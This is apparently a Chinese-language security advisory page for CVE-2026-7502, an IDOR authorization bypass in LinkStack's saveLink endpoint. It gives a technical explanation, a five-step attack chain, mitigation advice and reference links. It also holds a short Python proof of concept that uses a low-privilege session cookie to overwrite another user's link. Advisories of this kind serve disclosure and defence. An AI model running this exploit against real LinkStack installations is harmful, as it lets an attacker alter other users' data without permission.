CVE-2026-7502 CVSS 5.4 中危

CVE-2026-7502 LinkStack授权绕过漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7502

漏洞类型

授权绕过

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

LinkStackOrg LinkStack

漏洞概述

LinkStackOrg LinkStack 4.8.6及之前版本在管理端点组件中发现安全漏洞。该漏洞源于app/Http/Controllers/UserController.php文件中saveLink函数的授权验证缺失。攻击者无需特殊用户交互，仅需低权限账户即可远程发起攻击，利用该缺陷绕过授权限制，篡改系统数据。目前该漏洞利用代码已公开，建议立即修复。

技术细节

该漏洞属于不安全的直接对象引用（IDOR）与授权绕过缺陷。在LinkStack的UserController.php中，saveLink函数负责处理用户链接的保存与更新操作。由于开发者在实现业务逻辑时，未对当前操作用户与目标链接ID之间的归属关系进行严格的二次校验，导致系统存在越权访问风险。具体而言，当攻击者获取一个低权限账户后，可以通过拦截并篡改发送至saveLink接口的HTTP请求，将目标链接ID修改为受害者的资源ID。由于后端仅依赖请求中的ID进行数据库操作而未验证所有权，攻击者能够成功修改、删除或覆盖其他用户的链接数据。此攻击过程无需用户交互，且攻击复杂度低，极大地增加了被利用的风险。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统使用的是LinkStackOrg LinkStack 4.8.6或更早版本。

STEP 2

获取凭证

攻击者在目标网站上注册一个普通低权限账户，获取有效的会话Cookie。

STEP 3

分析请求

攻击者分析网络流量，发现saveLink接口接收“id”参数来指定要修改的链接。

STEP 4

构造攻击载荷

攻击者篡改HTTP请求，将“id”参数修改为其他用户的链接ID，并更新链接内容。

STEP 5

执行利用

发送篡改后的请求，后端因缺乏所有权校验，直接接受了修改请求，导致数据被非授权更改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept for Authorization Bypass in LinkStack saveLink
import requests

target_url = "http://target.com/user/saveLink"
# Attacker's low privilege session cookie
cookies = {
    "laravel_session": "attacker_session_value_here"
}

# The attacker attempts to update a link owned by another user (e.g., ID 42)
payload = {
    "id": "42",  # The vulnerable parameter allowing IDOR
    "title": "Hacked by Attacker",
    "url": "http://malicious-site.com",
    "description": "This link has been modified via auth bypass"
}

response = requests.post(target_url, data=payload, cookies=cookies)

if response.status_code == 200 and "success" in response.text:
    print("[+] Exploit successful! Authorization bypassed.")
else:
    print("[-] Exploit failed.")

影响范围

LinkStackOrg LinkStack <= 4.8.6

防御指南

临时缓解措施

在未升级版本前，建议管理员通过WAF等安全设备阻断对/user/saveLink接口的非预期访问，并在后端临时增加逻辑以验证当前会话用户是否拥有请求操作链接的所有权。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7502
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7502
3 Details https://www.cvedetails.com/cve/CVE-2026-7502/
4 VulDB https://vuldb.com/cve/CVE-2026-7502
5 Link https://github.com/LinkStackOrg/LinkStack/
6 Link https://github.com/LinkStackOrg/LinkStack/pull/975
7 Link https://github.com/LinkStackOrg/LinkStack/pull/975#issuecomment-4224234970
8 Link https://github.com/az10b/security-advisories/blob/main/idor_linkstack.md
9 Link https://vuldb.com/submit/801787
10 Link https://vuldb.com/vuln/360312
11 Link https://vuldb.com/vuln/360312/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表